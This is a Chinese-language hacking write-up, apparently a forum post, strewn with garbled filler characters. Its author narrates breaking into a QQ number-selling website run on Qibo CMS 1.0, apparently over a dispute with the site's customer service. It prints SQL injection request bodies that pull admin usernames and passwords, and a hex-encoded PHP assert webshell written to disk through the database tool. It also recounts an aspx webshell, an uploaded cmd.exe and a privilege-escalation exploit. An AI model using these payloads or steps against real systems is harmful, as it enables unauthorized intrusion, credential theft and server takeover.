|
# w8 Q8 n- }! L& L8 s+ o
5 ]' d, S0 ?4 q1 D
) X6 |5 G0 J* n/ x
3 y0 v; k, ^/ _7 p7 g 一、踩点寻找漏洞
% U3 K. W" E8 P# i闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。 2 U% `1 Y- J, R$ r* v9 t' E7 E1 n
随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
- Q6 s- A' ]5 F' x先注册一个用户,记住注册时候的邮箱以uid号,
) e) u* N& Y% W p+ [: E
/ x! L; m n T2 z l % C4 s1 W0 N1 e' O7 p6 t; Q
然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下: ' o# i) }) u C0 [
4 l$ Q8 d/ \7 E9 h
truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23 ! r2 |) I- k6 v& y, w* ~% \1 g
这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图: 6 R/ b1 k& x3 Z; ?; Q

4 q4 f9 n( l) r+ P- C5 M( h确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23 3 |( g7 K6 U# C/ }3 I2 x, Q
 ; z& |" l/ K% D; j4 \3 G
' p# G4 @; J9 U7 f( L5 i4 J- c u
解密进后台如图:
, N- q, w$ A; o( `3 R $ h, Z# i/ ~" u6 j
6 y+ T& o9 Y$ N/ j) L+ B0 D 2 H$ w; u# b( W
二、后台getwebshell ) N5 C/ r1 a1 x, T$ \( q& e
进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图: % j) T7 x1 C* ~. J( i
" t" v% b) k' f9 C
, W; \7 e$ t- f [* H
, E, Z o+ n" K8 M) Q0 m9 S然后点确定,添加提示 9 Y/ e) S0 B3 I& A
# _ \( A" U: r% ^
: u! w/ j( d/ {6 f/ P( f/ w " L7 J5 [# K+ g7 x" O
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图: 9 t* {, Y6 B) W4 N$ A" @
3 `3 R% _* h" P8 ^. ]; L 6 B$ K+ |! q2 e$ w4 s2 u+ v- n1 n
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下 9 Z3 v1 l1 T, f* Q* p
如图: " G, @% N) l C! l3 m: k3 |; M
 2 d! L% q% i5 k! }/ F
 2 s& [1 Q5 I9 n& F- x% I
$ p3 H( \' r0 u, Z2 ]
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开 ! b- \# w) w5 A8 b
6 I! e$ @) ?/ Z& s ; I& a+ l7 l S! ]
; t. L$ Q) M+ _
三、提权进服务器 7 B. b# j' W; C" d
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图: # G# M5 w* J1 E. G
 7 X% m! \: V2 m! U9 j+ Y: l
5 n3 o6 s% u5 ?% \+ ?2 Y0 m$ W8 f/ e啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
2 H, u f* j4 z: W+ \0 X - L+ i8 J5 s+ L% \( i* P) x$ w
( H. n; [" `1 \6 J, y
然后登陆服务器如图: 8 M# A$ z0 k" R. s" \9 m1 t
0 v$ ?8 J$ D; ]- E5 f9 a) E( m8 Y
! Q8 Y: P! D8 F6 a6 ] . U& x2 u% c. g- m p
( n7 o4 w& t) s7 c+ |; }
% d$ d! m. h) j4 T+ U
难怪普通刀连接不上,原来是有狗。
( o; \3 G7 u5 _4 b$ Z
# l$ q* K, q/ t5 i
. u% b$ _& t' K+ Y# ~7 Y+ y 3 Y+ g' a' | X. y% m
4 I, M$ `$ s* F8 c- o
7 m N; V* W. O* F
; D5 r0 H2 o# ?2 F L" T8 ^ |